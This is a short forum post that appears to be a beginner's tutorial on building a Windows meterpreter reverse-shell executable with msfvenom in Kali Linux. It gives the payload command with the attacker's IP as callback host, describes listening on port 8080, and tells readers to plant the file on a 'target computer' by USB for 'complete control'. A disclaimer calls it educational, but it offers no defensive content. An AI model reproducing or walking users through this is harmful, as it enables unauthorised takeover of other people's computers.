Forum Thread: How Make a Simple Payload with Kali Linux (Detectable)

_

Step 1: Open the Kali Linux Terminal

Click and run the terminal

Step 2: Create the Payload for Windows 10

In the terminal type:
msfvenom -p windows/x64/meterpreter/reversetcp LPORT=8080 LHOST=your ip adress -o filename.exe_
With this commands we create the file with the payload
_If you want to see this file, type in the terminal '' mv filename.exe Desktop/''

Step 3: Wait for the Input

After writing the commands described in step 2 we must write a command to '' listen '' to port 8080 (previously chosen) and wait for the .exe file to be activated on the target computer

Step 4: Transfer the File into the Target Computer

After created the file with the payload we must transfer the file in the target computer, so copy and paste the file into an USB stick, transfer the file into the computer and run as administrator.

Step 5:

When you run the .exe file on the terget computer you have the ''complete'' controll of the computer

Step 6: THIS GUIDE WAS CREATED FOR EDUCATIONAL AND PREVENTION PURPOSES

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active